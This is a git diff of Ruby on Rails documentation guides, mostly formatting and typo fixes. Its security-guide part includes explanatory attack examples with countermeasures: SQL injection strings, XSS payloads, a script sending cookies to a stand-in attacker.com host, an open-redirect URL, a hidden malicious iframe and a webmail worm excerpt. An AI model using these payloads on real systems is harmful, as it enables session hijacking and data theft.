@@ -1157,15 +1156,15 @@ The +has_many+ association supports these options: * +:uniq+ * +:validate+ -h6. :as +h6. +:as+ -Setting the +:as+ option indicates that this is a polymorphic association, as discussed <a href="#polymorphic-associations">earlier in this guide</a>. +Setting the +:as+ option indicates that this is a polymorphic association, as discussed <a href="#polymorphicassociations">earlier in this guide</a>. -h6. :autosave +h6. +:autosave+ If you set the +:autosave+ option to +true+, Rails will save any loaded members and destroy members that are marked for destruction whenever you save the parent object. -h6. :class_name +h6. +:class_name+ If the name of the other model cannot be derived from the association name, you can use the +:class_name+ option to supply the model name. For example, if a customer has many orders, but the actual name of the model containing orders is +Transaction+, you'd set things up this way: @@ -1175,7 +1174,7 @@ class Customer < ActiveRecord::Base end </ruby> -h6. :conditions +h6. +:conditions+ The +:conditions+ option lets you specify the conditions that the associated object must meet (in the syntax used by a SQL +WHERE+ clause). 
@@ -1197,27 +1196,27 @@ end If you use a hash-style +:conditions+ option, then record creation via this association will be automatically scoped using the hash. In this case, using +@customer.confirmed_orders.create+ or +@customer.confirmed_orders.build+ will create orders where the confirmed column has the value +true+. -h6. :counter_sql +h6. +:counter_sql+ Normally Rails automatically generates the proper SQL to count the association members. With the +:counter_sql+ option, you can specify a complete SQL statement to count them yourself. NOTE: If you specify +:finder_sql+ but not +:counter_sql+, then the counter SQL will be generated by substituting +SELECT COUNT(*) FROM+ for the +SELECT ... FROM+ clause of your +:finder_sql+ statement. -h6. :dependent +h6. +:dependent+ -If you set the +:dependent+ option to +:destroy+, then deleting this object will call the destroy method on the associated objects to delete those objects. If you set the +:dependent+ option to +:delete_all+, then deleting this object will delete the associated objects _without_ calling their +destroy+ method. If you set the +:dependent+ option to +:nullify+, then deleting this object will set the foreign key in the associated objects to +NULL+. +If you set the +:dependent+ option to +:destroy+, then deleting this object will call the +destroy+ method on the associated objects to delete those objects. If you set the +:dependent+ option to +:delete_all+, then deleting this object will delete the associated objects _without_ calling their +destroy+ method. If you set the +:dependent+ option to +:nullify+, then deleting this object will set the foreign key in the associated objects to +NULL+. NOTE: This option is ignored when you use the +:through+ option on the association. -h6. :extend +h6. +:extend+ -The +:extend+ option specifies a named module to extend the association proxy. Association extensions are discussed in detail <a href="#association-extensions">later in this guide</a>. 
+The +:extend+ option specifies a named module to extend the association proxy. Association extensions are discussed in detail <a href="#associationextensions">later in this guide</a>. -h6. :finder_sql +h6. +:finder_sql+ Normally Rails automatically generates the proper SQL to fetch the association members. With the +:finder_sql+ option, you can specify a complete SQL statement to fetch them yourself. If fetching objects requires complex multi-table SQL, this may be necessary. -h6. :foreign_key +h6. +:foreign_key+ By convention, Rails guesses that the column used to hold the foreign key on the other model is the name of this model with the suffix +_id+ added. The +:foreign_key+ option lets you set the name of the foreign key directly: @@ -1229,7 +1228,7 @@ end TIP: In any case, Rails will not create foreign key columns for you. You need to explicitly define them as part of your migrations. -h6. :group +h6. +:group+ The +:group+ option supplies an attribute name to group the result set by, using a +GROUP BY+ clause in the finder SQL. @@ -1239,7 +1238,7 @@ class Customer < ActiveRecord::Base end </ruby> -h6. :include +h6. +:include+ You can use the +:include+ option to specify second-order associations that should be eager-loaded when this association is used. For example, consider these models: @@ -1275,7 +1274,7 @@ class LineItem < ActiveRecord::Base end </ruby> -h6. :limit +h6. +:limit+ The +:limit+ option lets you restrict the total number of objects that will be fetched through an association. @@ -1286,11 +1285,11 @@ class Customer < ActiveRecord::Base end </ruby> -h6. :offset +h6. +:offset+ The +:offset+ option lets you specify the starting offset for fetching objects via an association. For example, if you set +:offset => 11+, it will skip the first 11 records. -h6. :order +h6. +:order+ The +:order+ option dictates the order in which associated objects will be received (in the syntax used by a SQL +ORDER BY+ clause). 
@@ -1300,41 +1299,41 @@ class Customer < ActiveRecord::Base end </ruby> -h6. :primary_key +h6. +:primary_key+ -By convention, Rails guesses that the column used to hold the primary key of this model is +id+. You can override this and explicitly specify the primary key with the +:primary_key+ option. +By convention, Rails guesses that the column used to hold the primary key of the association is +id+. You can override this and explicitly specify the primary key with the +:primary_key+ option. -h6. :readonly +h6. +:readonly+ If you set the +:readonly+ option to +true+, then the associated objects will be read-only when retrieved via the association. -h6. :select +h6. +:select+ The +:select+ option lets you override the SQL +SELECT+ clause that is used to retrieve data about the associated objects. By default, Rails retrieves all columns. WARNING: If you specify your own +:select+, be sure to include the primary key and foreign key columns of the associated model. If you do not, Rails will throw an error. -h6. :source +h6. +:source+ The +:source+ option specifies the source association name for a +has_many :through+ association. You only need to use this option if the name of the source association cannot be automatically inferred from the association name. -h6. :source_type +h6. +:source_type+ The +:source_type+ option specifies the source association type for a +has_many :through+ association that proceeds through a polymorphic association. -h6. :through +h6. +:through+ -The +:through+ option specifies a join model through which to perform the query. +has_many :through+ associations provide a way to implement many-to-many relationships, as discussed <a href="#thehas-manythrough-association">earlier in this guide</a>. +The +:through+ option specifies a join model through which to perform the query. +has_many :through+ associations provide a way to implement many-to-many relationships, as discussed <a href="#thehas-manythroughassociation">earlier in this guide</a>. 
-h6. :uniq +h6. +:uniq+ Specify the +:uniq => true+ option to remove duplicates from the collection. This is most useful in conjunction with the +:through+ option. -h6. :validate +h6. +:validate+ If you set the +:validate+ option to +false+, then associated objects will not be validated whenever you save this object. By default, this is +true+: associated objects will be validated when this object is saved. -h5. When are Objects Saved? +h5. When are objects saved? When you assign an object to a +has_many+ association, that object is automatically saved (in order to update its foreign key). If you assign multiple objects in one statement, then they are all saved. @@ -1344,11 +1343,11 @@ If the parent object (the one declaring the +has_many+ association) is unsaved ( If you want to assign an object to a +has_many+ association without saving the object, use the <tt><em>collection</em>.build</tt> method. -h4. has_and_belongs_to_many Association Reference +h4. +has_and_belongs_to_many+ association reference The +has_and_belongs_to_many+ association creates a many-to-many relationship with another model. In database terms, this associates two classes via an intermediate join table that includes foreign keys referring to each of the classes. -h5. Methods Added +h5. Methods added When you declare a +has_and_belongs_to_many+ association, the declaring class automatically gains 13 methods related to the association: 
@@ -1392,14 +1391,14 @@ assemblies.build(attributes = {}, ...) assemblies.create(attributes = {}) </ruby> -h6. Additional Column Methods +h6. Additional column methods If the join table for a +has_and_belongs_to_many+ association has additional columns beyond the two foreign keys, these columns will be added as attributes to records retrieved via that association. Records returned with additional attributes will always be read-only, because Rails cannot save changes to those attributes. WARNING: The use of extra attributes on the join table in a +has_and_belongs_to_many+ association is deprecated. If you require this sort of complex behavior on the table that joins two models in a many-to-many relationship, you should use a +has_many :through+ association instead of +has_and_belongs_to_many+. -h6. <em>collection</em>(force_reload = false) +h6. <tt><em>collection</em>(force_reload = false)</tt> The <tt><em>collection</em></tt> method returns an array of all of the associated objects. If there are no associated objects, it returns an empty array. @@ -1407,7 +1406,7 @@ The <tt><em>collection</em></tt> method returns an array of all of the associate @assemblies = @part.assemblies </ruby> -h6. <em>collection</em><<(object, ...) +h6. <tt><em>collection</em><<(object, ...)</tt> The <tt><em>collection</em><<</tt> method adds one or more objects to the collection by creating records in the join table. @@ -1417,7 +1416,7 @@ The <tt><em>collection</em><<</tt> method adds one or more objects to the collec NOTE: This method is aliased as <tt><em>collection</em>.concat</tt> and <tt><em>collection</em>.push</tt>. -h6. <em>collection</em>.delete(object, ...) +h6. <tt><em>collection</em>.delete(object, ...)</tt> The <tt><em>collection</em>.delete</tt> method removes one or more objects from the collection by deleting records in the join table. This does not destroy the objects. 
@@ -1425,11 +1424,11 @@ The <tt><em>collection</em>.delete</tt> method removes one or more objects from @part.assemblies.delete(@assembly1) </ruby> -h6. <em>collection</em>=objects +h6. <tt><em>collection</em>=objects</tt> The <tt><em>collection</em>=</tt> method makes the collection contain only the supplied objects, by adding and deleting as appropriate. -h6. <em>collection_singular</em>_ids +h6. <tt><em>collection_singular</em>_ids</tt> The <tt><em>collection_singular</em>_ids</tt> method returns an array of the ids of the objects in the collection. @@ -1437,15 +1436,15 @@ The <tt><em>collection_singular</em>_ids</tt> method returns an array of the ids @assembly_ids = @part.assembly_ids </ruby> -h6. <em>collection_singular</em>_ids=ids +h6. <tt><em>collection_singular</em>_ids=ids</tt> The <tt><em>collection_singular</em>_ids=</tt> method makes the collection contain only the objects identified by the supplied primary key values, by adding and deleting as appropriate. -h6. <em>collection</em>.clear +h6. <tt><em>collection</em>.clear</tt> The <tt><em>collection</em>.clear</tt> method removes every object from the collection by deleting the rows from the joining table. This does not destroy the associated objects. -h6. <em>collection</em>.empty? +h6. <tt><em>collection</em>.empty?</tt> The <tt><em>collection</em>.empty?</tt> method returns +true+ if the collection does not contain any associated objects. @@ -1455,7 +1454,7 @@ The <tt><em>collection</em>.empty?</tt> method returns +true+ if the collection <% end %> </ruby> -h6. <em>collection</em>.size +h6. <tt><em>collection</em>.size</tt> The <tt><em>collection</em>.size</tt> method returns the number of objects in the collection. 
@@ -1463,7 +1462,7 @@ The <tt><em>collection</em>.size</tt> method returns the number of objects in th @assembly_count = @part.assemblies.size </ruby> -h6. <em>collection</em>.find(...) +h6. <tt><em>collection</em>.find(...)</tt> The <tt><em>collection</em>.find</tt> method finds objects within the collection. It uses the same syntax and options as +ActiveRecord::Base.find+. It also adds the additional condition that the object must be in the collection. @@ -1472,11 +1471,11 @@ The <tt><em>collection</em>.find</tt> method finds objects within the collection :conditions => ["created_at > ?", 2.days.ago]) </ruby> -h6. <em>collection</em>.exist?(...) +h6. <tt><em>collection</em>.exist?(...)</tt> The <tt><em>collection</em>.exist?</tt> method checks whether an object meeting the supplied conditions exists in the collection. It uses the same syntax and options as +ActiveRecord::Base.exists?+. -h6. <em>collection</em>.build(attributes = {}) +h6. <tt><em>collection</em>.build(attributes = {})</tt> The <tt><em>collection</em>.build</tt> method returns a new object of the associated type. This object will be instantiated from the passed attributes, and the link through the join table will be created, but the associated object will _not_ yet be saved. @@ -1485,7 +1484,7 @@ The <tt><em>collection</em>.build</tt> method returns a new object of the associ {:assembly_name => "Transmission housing"}) </ruby> -h6. <em>collection</em>.create(attributes = {}) +h6. <tt><em>collection</em>.create(attributes = {})</tt> The <tt><em>collection</em>.create</tt> method returns a new object of the associated type. This object will be instantiated from the passed attributes, the link through the join table will be created, and the associated object _will_ be saved (assuming that it passes any validations). 
@@ -1494,7 +1493,7 @@ The <tt><em>collection</em>.create</tt> method returns a new object of the assoc {:assembly_name => "Transmission housing"}) </ruby> -h5. Options for has_and_belongs_to_many +h5. Options for +has_and_belongs_to_many+ In many situations, you can use the default behavior for +has_and_belongs_to_many+ without any customization. But you can alter that behavior in a number of ways. This section covers the options that you can pass when you create a +has_and_belongs_to_many+ association. For example, an association with several options might look like this: @@ -1528,7 +1527,7 @@ The +has_and_belongs_to_many+ association supports these options: * +:uniq+ * +:validate+ -h6. :association_foreign_key +h6. +:association_foreign_key+ By convention, Rails guesses that the column in the join table used to hold the foreign key pointing to the other model is the name of that model with the suffix +_id+ added. The +:association_foreign_key+ option lets you set the name of the foreign key directly: @@ -1542,11 +1541,11 @@ class User < ActiveRecord::Base end </ruby> -h6. :autosave +h6. +:autosave+ If you set the +:autosave+ option to +true+, Rails will save any loaded members and destroy members that are marked for destruction whenever you save the parent object. -h6. :class_name +h6. +:class_name+ If the name of the other model cannot be derived from the association name, you can use the +:class_name+ option to supply the model name. For example, if a part has many assemblies, but the actual name of the model containing assemblies is +Gadget+, you'd set things up this way: @@ -1556,7 +1555,7 @@ class Parts < ActiveRecord::Base end </ruby> -h6. :conditions +h6. +:conditions+ The +:conditions+ option lets you specify the conditions that the associated object must meet (in the syntax used by a SQL +WHERE+ clause). 
@@ -1576,27 +1575,27 @@ class Parts < ActiveRecord::Base end </ruby> -If you use a hash-style +:conditions+ option, then record creation via this association will be automatically scoped using the hash. In this case, using +@parts.assemblies.create+ or +@parts.assemblies.build+ will create orders where the factory column has the value "Seattle". +If you use a hash-style +:conditions+ option, then record creation via this association will be automatically scoped using the hash. In this case, using +@parts.assemblies.create+ or +@parts.assemblies.build+ will create orders where the +factory+ column has the value "Seattle". -h6. :counter_sql +h6. +:counter_sql+ Normally Rails automatically generates the proper SQL to count the association members. With the +:counter_sql+ option, you can specify a complete SQL statement to count them yourself. NOTE: If you specify +:finder_sql+ but not +:counter_sql+, then the counter SQL will be generated by substituting +SELECT COUNT(*) FROM+ for the +SELECT ... FROM+ clause of your +:finder_sql+ statement. -h6. :delete_sql +h6. +:delete_sql+ Normally Rails automatically generates the proper SQL to remove links between the associated classes. With the +:delete_sql+ option, you can specify a complete SQL statement to delete them yourself. -h6. :extend +h6. +:extend+ -The +:extend+ option specifies a named module to extend the association proxy. Association extensions are discussed in detail <a href="#association-extensions">later in this guide</a>. +The +:extend+ option specifies a named module to extend the association proxy. Association extensions are discussed in detail <a href="#associationextensions">later in this guide</a>. -h6. :finder_sql +h6. +:finder_sql+ Normally Rails automatically generates the proper SQL to fetch the association members. With the +:finder_sql+ option, you can specify a complete SQL statement to fetch them yourself. If fetching objects requires complex multi-table SQL, this may be necessary. -h6. 
:foreign_key +h6. +:foreign_key+ By convention, Rails guesses that the column in the join table used to hold the foreign key pointing to this model is the name of this model with the suffix +_id+ added. The +:foreign_key+ option lets you set the name of the foreign key directly: @@ -1608,7 +1607,7 @@ class User < ActiveRecord::Base end </ruby> -h6. :group +h6. +:group+ The +:group+ option supplies an attribute name to group the result set by, using a +GROUP BY+ clause in the finder SQL. @@ -1618,19 +1617,19 @@ class Parts < ActiveRecord::Base end </ruby> -h6. :include +h6. +:include+ You can use the +:include+ option to specify second-order associations that should be eager-loaded when this association is used. -h6. :insert_sql +h6. +:insert_sql+ Normally Rails automatically generates the proper SQL to create links between the associated classes. With the +:insert_sql+ option, you can specify a complete SQL statement to insert them yourself. -h6. :join_table +h6. +:join_table+ If the default name of the join table, based on lexical ordering, is not what you want, you can use the +:join_table+ option to override the default. -h6. :limit +h6. +:limit+ The +:limit+ option lets you restrict the total number of objects that will be fetched through an association. @@ -1641,11 +1640,11 @@ class Parts < ActiveRecord::Base end </ruby> -h6. :offset +h6. +:offset+ The +:offset+ option lets you specify the starting offset for fetching objects via an association. For example, if you set +:offset => 11+, it will skip the first 11 records. -h6. :order +h6. +:order+ The +:order+ option dictates the order in which associated objects will be received (in the syntax used by a SQL +ORDER BY+ clause). 
@@ -1655,23 +1654,23 @@ class Parts < ActiveRecord::Base end </ruby> -h6. :readonly +h6. +:readonly+ If you set the +:readonly+ option to +true+, then the associated objects will be read-only when retrieved via the association. -h6. :select +h6. +:select+ The +:select+ option lets you override the SQL +SELECT+ clause that is used to retrieve data about the associated objects. By default, Rails retrieves all columns. -h6. :uniq +h6. +:uniq+ Specify the +:uniq => true+ option to remove duplicates from the collection. -h6. :validate +h6. +:validate+ If you set the +:validate+ option to +false+, then associated objects will not be validated whenever you save this object. By default, this is +true+: associated objects will be validated when this object is saved. -h5. When are Objects Saved? +h5. When are objects saved? When you assign an object to a +has_and_belongs_to_many+ association, that object is automatically saved (in order to update the join table). If you assign multiple objects in one statement, then they are all saved. @@ -1681,7 +1680,7 @@ If the parent object (the one declaring the +has_and_belongs_to_many+ associatio If you want to assign an object to a +has_and_belongs_to_many+ association without saving the object, use the <tt><em>collection</em>.build</tt> method. -h4. Association Callbacks +h4. Association callbacks Normal callbacks hook into the lifecycle of Active Record objects, allowing you to work with those objects at various points. For example, you can use a +:before_save+ callback to cause something to happen just before an object is saved. 
@@ -1725,7 +1724,7 @@ end If a +before_add+ callback throws an exception, the object does not get added to the collection. Similarly, if a +before_remove+ callback throws an exception, the object does not get removed from the collection. -h4. Association Extensions +h4. Association extensions You're not limited to the functionality that Rails automatically builds into association proxy objects. You can also extend these objects through anonymous modules, adding new finders, creators, or other methods. For example: @@ -1757,7 +1756,7 @@ class Supplier < ActiveRecord::Base end </ruby> -To include more than one extension module in a single association, specify an array of names: +To include more than one extension module in a single association, specify an array of modules: <ruby> class Customer < ActiveRecord::Base diff --git a/railties/guides/source/caching_with_rails.textile b/railties/guides/source/caching_with_rails.textile index 9736be8443..b1c1af8be4 100644 --- a/railties/guides/source/caching_with_rails.textile +++ b/railties/guides/source/caching_with_rails.textile 
@@ -500,16 +500,17 @@ seriously considering optimizing their caching needs. Also the new "Cache money":http://github.com/nkallen/cache-money/tree/master plugin is supposed to be mad cool. h3. References - * "RailsEnvy, Rails Caching Tutorial, Part 1":http://www.railsenvy.com/2007/2/28/rails-caching-tutorial - * "RailsEnvy, Rails Caching Tutorial, Part 1":http://www.railsenvy.com/2007/3/20/ruby-on-rails-caching-tutorial-part-2 - * "ActiveSupport::Cache documentation":http://api.rubyonrails.org/classes/ActiveSupport/Cache.html - * "Rails 2.1 integrated caching tutorial":http://thewebfellas.com/blog/2008/6/9/rails-2-1-now-with-better-integrated-caching +* "RailsEnvy, Rails Caching Tutorial, Part 1":http://www.railsenvy.com/2007/2/28/rails-caching-tutorial +* "RailsEnvy, Rails Caching Tutorial, Part 1":http://www.railsenvy.com/2007/3/20/ruby-on-rails-caching-tutorial-part-2 +* "ActiveSupport::Cache documentation":http://api.rubyonrails.org/classes/ActiveSupport/Cache.html +* "Rails 2.1 integrated caching tutorial":http://thewebfellas.com/blog/2008/6/9/rails-2-1-now-with-better-integrated-caching h3. Changelog + "Lighthouse ticket":http://rails.lighthouseapp.com/projects/16213-rails-guides/tickets/10-guide-to-caching -February 22, 2009: Beefed up the section on cache_stores -December 27, 2008: Typo fixes -November 23, 2008: Incremental updates with various suggested changes and formatting cleanup -September 15, 2008: Initial version by Aditya Chadha +* February 22, 2009: Beefed up the section on cache_stores +* December 27, 2008: Typo fixes +* November 23, 2008: Incremental updates with various suggested changes and formatting cleanup +* September 15, 2008: Initial version by Aditya Chadha diff --git a/railties/guides/source/index.erb.textile b/railties/guides/source/index.erb.textile index 4751c3a1f5..49d8cad404 100644 --- a/railties/guides/source/index.erb.textile +++ b/railties/guides/source/index.erb.textile 
@@ -73,6 +73,10 @@ h3. Digging Deeper <dl> +<% guide("Rails on Rack", 'rails_on_rack.html') do %> + This guide covers Rails integration with Rack and interfacing with other Rack components. +<% end %> + <% guide("Rails Internationalization API", 'i18n.html', :ticket => 23) do %> This guide covers how to add internationalization to your applications. Your application will be able to translate content to different languages, change pluralization rules, use correct date formats for each country and so on. <% end %> @@ -109,8 +113,8 @@ h3. Digging Deeper This guide covers the command line tools and rake tasks provided by Rails. <% end %> -<% guide("Rails on Rack", 'rails_on_rack.html', :ticket => 58) do %> - This guide covers Rails integration with Rack and interfacing with other Rack components. +<% guide("Caching with Rails", 'caching_with_rails.html', :ticket => 10) do %> + Various caching techniques provided by Rails. <% end %> </dl> diff --git a/railties/guides/source/layouts_and_rendering.textile b/railties/guides/source/layouts_and_rendering.textile index d9bc605b84..5e2cedcf0c 100644 --- a/railties/guides/source/layouts_and_rendering.textile +++ b/railties/guides/source/layouts_and_rendering.textile @@ -683,7 +683,7 @@ Within the context of a layout, +yield+ identifies a section where content from </head> <body> <%= yield %> - <hbody> + </body> </html> </erb> @@ -696,7 +696,7 @@ You can also create a layout with multiple yielding regions: </head> <body> <%= yield %> - <hbody> + </body> </html> </erb> @@ -723,7 +723,7 @@ The result of rendering this page into the supplied layout would be this HTML: </head> <body> <p>Hello, Rails!</p> - <hbody> + </body> </html> </erb> 
@@ -822,7 +822,7 @@ Every partial also has a local variable with the same name as the partial (minus <%= render :partial => "customer", :object => @new_customer %> </erb> -Within the +customer+ partial, the +@customer+ variable will refer to +@new_customer+ from the parent view. +Within the +customer+ partial, the +customer+ variable will refer to +@new_customer+ from the parent view. WARNING: In previous versions of Rails, the default local variable would look for an instance variable with the same name as the partial in the parent. This behavior is deprecated in Rails 2.2 and will be removed in a future version. diff --git a/railties/guides/source/security.textile b/railties/guides/source/security.textile index 6b84ca1965..5797eb888b 100644 --- a/railties/guides/source/security.textile +++ b/railties/guides/source/security.textile @@ -91,12 +91,12 @@ Rails 2 introduced a new default session storage, CookieStore. CookieStore saves That means the security of this storage depends on this secret (and on the digest algorithm, which defaults to SHA512, which has not been compromised, yet). So _(highlight)don't use a trivial secret, i.e. a word from a dictionary, or one which is shorter than 30 characters_. Put the secret in your environment.rb: -<pre> +<ruby> config.action_controller.session = { :key => '_app_session', :secret => '0x0dkfj3927dkc7djdh36rkckdfzsg...' } -</pre> +</ruby> There are, however, derivatives of CookieStore which encrypt the session hash, so the client cannot see it. 
@@ -211,9 +211,9 @@ If your web application is RESTful, you might be used to additional HTTP verbs, _(highlight)The verify method in a controller can make sure that specific actions may not be used over GET_. Here is an example to verify the use of the transfer action over POST. If the action comes in using any other verb, it redirects to the list action. -<pre> +<ruby> verify :method => :post, :only => [:transfer], :redirect_to => {:action => :list} -</pre> +</ruby> With this precaution, the attack from above will not work, because the browser sends a GET request for images, which will not be accepted by the web application. @@ -264,9 +264,9 @@ end This will redirect the user to the main action if he tried to access a legacy action. The intention was to preserve the URL parameters to the legacy action and pass them to the main action. However, it can exploited by an attacker if he includes a host key in the URL: -<pre> +<plain> http://www.example.com/site/legacy?param1=xy¶m2=23&host=www.attacker.com -</pre> +</plain> If it is at the end of the URL it will hardly be noticed and redirects the user to the attacker.com host. A simple countermeasure would be to _(highlight)include only the expected parameters in a legacy action_ (again a whitelist approach, as opposed to removing unexpected parameters). _(highlight)And if you redirect to an URL, check it with a whitelist or a regular expression_. 
@@ -424,10 +424,10 @@ There are some authorization and authentication plug-ins for Rails available. A Every new user gets an activation code to activate his account when he gets an e-mail with a link in it. After activating the account, the activation_code columns will be set to NULL in the database. If someone requested an URL like these, he would be logged in as the first activated user found in the database (and chances are that this is the administrator): -<pre> +<plain> http://localhost:3006/user/activate http://localhost:3006/user/activate?id= -</pre> +</plain> This is possible because on some servers, this way the parameter id, as in params[:id], would be nil. However, here is the finder from the activation action: @@ -437,9 +437,9 @@ User.find_by_activation_code(params[:id]) If the parameter was nil, the resulting SQL query will be -<pre> +<sql> SELECT * FROM users WHERE (users.activation_code IS NULL) LIMIT 1 -</pre> +</sql> And thus it found the first user in the database, returned it and logged him in. You can find out more about it in "my blog post":http://www.rorsecurity.info/2007/10/28/restful_authentication-login-security/. _(highlight)It is advisable to update your plug-ins from time to time_. Moreover, you can review your application to find more flaws like this. 
@@ -534,9 +534,9 @@ end This means, upon saving, the model will validate the file name to consist only of alphanumeric characters, dots, + and -. And the programmer added \^ and $ so that file name will contain these characters from the beginning to the end of the string. However, _(highlight)in Ruby ^ and $ matches the *line* beginning and line end_. And thus a file name like this passes the filter without problems: -<pre> +<plain> file.txt%0A<script>alert('hello')</script> -</pre> +</plain> Whereas %0A is a line feed in URL encoding, so Rails automatically converts it to "file.txt\n<script>alert('hello')</script>". This file name passes the filter because the regular expression matches – up to the line end, the rest does not matter. The correct expression should read: @@ -599,9 +599,9 @@ Project.find(:all, :conditions => "name = '#{params[:name]}'") This could be in a search action and the user may enter a project's name that he wants to find. If a malicious user enters ' OR 1=1', the resulting SQL query will be: -<pre> +<sql> SELECT * FROM projects WHERE name = '' OR 1 --' -</pre> +</sql> The two dashes start a comment ignoring everything after it. So the query returns all records from the projects table including those blind to the user. This is because the condition is true for all records. @@ -615,9 +615,9 @@ User.find(:first, "login = '#{params[:name]}' AND password = '#{params[:password If an attacker enters ' OR '1'='1 as the name, and ' OR '2'>'1 as the password, the resulting SQL query will be: -<pre> +<sql> SELECT * FROM users WHERE login = '' OR '1'='1' AND password = '' OR '2'>'1' LIMIT 1 -</pre> +</sql> This will simply find the first record in the database, and grants access to this user. 
@@ -631,16 +631,16 @@ Project.find(:all, :conditions => "name = '#{params[:name]}'") And now let's inject another query using the UNION statement: -<pre> +<plain> ') UNION SELECT id,login AS name,password AS description,1,1,1 FROM users -- -</pre> +</plain> This will result in the following SQL query: -<pre> +<sql> SELECT * FROM projects WHERE (name = '') UNION SELECT id,login AS name,password AS description,1,1,1 FROM users --') -</pre> +</sql> The result won't be a list of projects (because there is no project with an empty name), but a list of user names and their password. So hopefully you encrypted the passwords in the database! The only problem for the attacker is, that the number of columns has to be the same in both queries. That's why the second query includes a list of ones (1), which will be always the value 1, in order to match the number of columns in the first query. 
@@ -686,36 +686,36 @@ The most common XSS language is of course the most popular client-side scripting Here is the most straightforward test to check for XSS: -<pre> +<html> <script>alert('Hello');</script> -</pre> +</html> This JavaScript code will simply display an alert box. The next examples do exactly the same, only in very uncommon places: -<pre> +<html> <img src=javascript:alert('Hello')> <table background="javascript:alert('Hello')"> -</pre> +</html> h6. Cookie theft These examples don't do any harm so far, so let's see how an attacker can steal the user's cookie (and thus hijack the user's session). In JavaScript you can use the document.cookie property to read and write the document's cookie. JavaScript enforces the same origin policy, that means a script from one domain cannot access cookies of another domain. The document.cookie property holds the cookie of the originating web server. However, you can read and write this property, if you embed the code directly in the HTML document (as it happens with XSS). Inject this anywhere in your web application to see your own cookie on the result page: -<pre> +<plain> <script>document.write(document.cookie);</script> -</pre> +</plain> For an attacker, of course, this is not useful, as the victim will see his own cookie. The next example will try to load an image from the URL http://www.attacker.com/ plus the cookie. Of course this URL does not exist, so the browser displays nothing. But the attacker can review his web server's access log files to see the victims cookie. 
-<pre> +<html> <script>document.write('<img src="http://www.attacker.com/' + document.cookie + '">');</script> -</pre> +</html> The log files on www.attacker.com will read like this: -<pre> +<plain> GET http://www.attacker.com/_app_session=836c1c25278e5b321d6bea4f19cb57e2 -</pre> +</plain> You can mitigate these attacks (in the obvious way) by adding the "httpOnly":http://dev.rubyonrails.org/ticket/8895 flag to cookies, so that document.cookie may not be read by JavaScript. Http only cookies can be used from IE v6.SP1, Firefox v2.0.0.5 and Opera 9.5. Safari is still considering, it ignores the option. But other, older browsers (such as WebTV and IE 5.5 on Mac) can actually cause the page to fail to load. Be warned that cookies "will still be visible using Ajax":http://ha.ckers.org/blog/20070719/firefox-implements-httponly-and-is-vulnerable-to-xmlhttprequest/, though. @@ -723,9 +723,9 @@ h6. Defacement With web page defacement an attacker can do a lot of things, for example, present false information or lure the victim on the attackers web site to steal the cookie, login credentials or other sensitive data. The most popular way is to include code from external sources by iframes: -<pre> +<html> <iframe name=”StatPage” src="http://58.xx.xxx.xxx" width=5 height=5 style=”display:none”></iframe> -</pre> +</html> This loads arbitrary HTML and/or JavaScript from an external source and embeds it as part of the site. This iFrame is taken from an "actual attack":http://www.symantec.com/enterprise/security_response/weblog/2007/06/italy_under_attack_mpack_gang.html on legitimate Italian sites using the "Mpack attack framework":http://isc.sans.org/diary.html?storyid=3015. Mpack tries to install malicious software through security holes in the web browser – very successfully, 50% of the attacks succeed. 
@@ -733,10 +733,10 @@ A more specialized attack could overlap the entire web site or display a login f Reflected injection attacks are those where the payload is not stored to present it to the victim later on, but included in the URL. Especially search forms fail to escape the search string. The following link presented a page which stated that "George Bush appointed a 9 year old boy to be the chairperson...": -<pre> +<plain> http://www.cbsnews.com/stories/2002/02/15/weather_local/main501644.shtml?zipcode=1--> <script src=http://www.securitylab.ru/test/sc.js></script><!-- -</pre> +</plain> h6. Countermeasures @@ -746,16 +746,16 @@ Especially for XSS, it is important to do _(highlight)whitelist input filtering Imagine a blacklist deletes “script” from the user input. Now the attacker injects “<scrscriptipt>”, and after the filter, “<script>” remains. Earlier versions of Rails used a blacklist approach for the strip_tags(), strip_links() and sanitize() method. So this kind of injection was possible: -<pre> +<ruby> strip_tags("some<<b>script>alert('hello')<</b>/script>") -</pre> +</ruby> This returned "some<script>alert('hello')</script>", which makes an attack work. That's why I vote for a whitelist approach, using the updated Rails 2 method sanitize(): -<pre> +<ruby> tags = %w(a acronym b strong i em li ul ol h1 h2 h3 h4 h5 h6 blockquote br cite sub sup ins p) s = sanitize(user_input, :tags => tags, :attributes => %w(href title)) -</pre> +</ruby> This allows only the given tags and does a good job, even against all kinds of tricks and malformed tags. 
@@ -765,24 +765,24 @@ h6. Obfuscation and Encoding Injection Network traffic is mostly based on the limited Western alphabet, so new character encodings, such as Unicode, emerged, to transmit characters in other languages. But, this is also a threat to web applications, as malicious code can be hidden in different encodings that the web browser might be able to process, but the web application might not. Here is an attack vector in UTF-8 encoding: -<pre> +<html> <IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97; &#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;> -</pre> +</html> This example pops up a message box. It will be recognized by the above sanitize() filter, though. A great tool to obfuscate and encode strings, and thus “get to know your enemy”, is the "Hackvertor":http://www.businessinfo.co.uk/labs/hackvertor/hackvertor.php. Rails‘ sanitize() method does a good job to fend off encoding attacks. h5. Examples from the underground -</pre> _In order to understand today's attacks on web applications, it's best to take a look at some real-world attack vectors._ +_In order to understand today's attacks on web applications, it's best to take a look at some real-world attack vectors._ The following is an excerpt from the "Js.Yamanner@m":http://www.symantec.com/security_response/writeup.jsp?docid=2006-061211-4111-99&tabid=1 Yahoo! Mail "worm":http://groovin.net/stuff/yammer.txt. It appeared on June 11, 2006 and was the first webmail interface worm: -<pre> +<html> <img src='http://us.i1.yimg.com/us.yimg.com/i/us/nt/ma/ma_mail_1.gif' target=""onload="var http_request = false; var Email = ''; var IDList = ''; var CRumb = ''; function makeRequest(url, Func, Method,Param) { ... -</pre> +</html> The worms exploits a hole in Yahoo's HTML/JavaScript filter, which usually filters all target and onload attributes from tags (because there can be JavaScript). 
